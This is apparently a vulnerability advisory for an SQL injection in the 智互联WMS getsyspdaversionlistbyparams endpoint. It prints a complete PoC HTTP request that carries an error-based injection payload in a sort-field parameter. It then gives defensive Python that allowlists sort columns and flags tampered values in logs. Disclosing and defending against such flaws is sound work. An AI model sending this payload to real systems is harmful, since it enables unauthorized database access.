智互联WMS getsyspdaversionlistbyparams SQL Injection Vulnerability

Date: 2025-10-14 | Affected software: 智互联WMS | PoC: public

Vulnerability description

SQL injection vulnerability in the getsyspdaversionlistbyparams interface of 智互联WMS.

PoC code

POST /dapilc/restful/service/ilcwmsplus/ISysPdaVersionService/getsyspdaversionlistbyparams HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 223
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36

{"condition":{"field":"createDate,(select/**/5422/**/from(select/**/count(*),concat(0x7e,md5(573137),0x7e,floor(rand(0)*2))x/**/from/**/information_schema.plugins/**/group/**/by/**/x)a)","order":"asc"},"current":1,"size":1}
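The request above carries its SQL in the `condition.field` sort value. As an added example (not code from the product or from the original page), the following shows one server-side way to handle that value with an allowlist, plus a strict identifier check usable for log review. The column mapping, the function names and the sample bodies are assumptions.

```python
import json
import re

# Assumption: the sortable columns of the PDA-version list. Only "createDate"
# appears on the page; the other key and all SQL column names are hypothetical.
SORTABLE_COLUMNS = {
    "createDate": "create_date",
    "versionCode": "version_code",
}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}
# Detection helper: a plain column name has nothing but identifier characters.
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")


def is_plain_identifier(value):
    """True when value is a bare column name (no commas, parentheses, comments)."""
    return isinstance(value, str) and IDENTIFIER.fullmatch(value) is not None


def build_order_by(body):
    """Return a safe ORDER BY clause for a request body, or raise ValueError.

    ORDER BY targets cannot be bound as query parameters, so the client value
    only selects an entry from a fixed mapping and is never copied into SQL.
    """
    try:
        condition = json.loads(body).get("condition", {})
    except (ValueError, AttributeError) as exc:
        raise ValueError("body is not a JSON object") from exc
    if not isinstance(condition, dict):
        raise ValueError("condition must be an object")
    field = condition.get("field", "createDate")
    order = condition.get("order", "asc")
    if not isinstance(field, str) or field not in SORTABLE_COLUMNS:
        raise ValueError("unsupported sort field")
    if not isinstance(order, str) or order.lower() not in SORT_DIRECTIONS:
        raise ValueError("unsupported sort order")
    return f"ORDER BY {SORTABLE_COLUMNS[field]} {SORT_DIRECTIONS[order.lower()]}"


# Constructed sample bodies in the shape of the request above.
BENIGN = '{"condition":{"field":"createDate","order":"desc"},"current":1,"size":1}'
TAMPERED = '{"condition":{"field":"createDate,(select 1)","order":"asc"},"current":1,"size":1}'

if __name__ == "__main__":
    print(build_order_by(BENIGN))
    for sample in (BENIGN, TAMPERED):
        field = json.loads(sample)["condition"]["field"]
        print(repr(field), "plain identifier:", is_plain_identifier(field))
```

A `condition.field` value that fails `is_plain_identifier` in request logs for this endpoint is worth reviewing, since a legitimate sort field is a single column name.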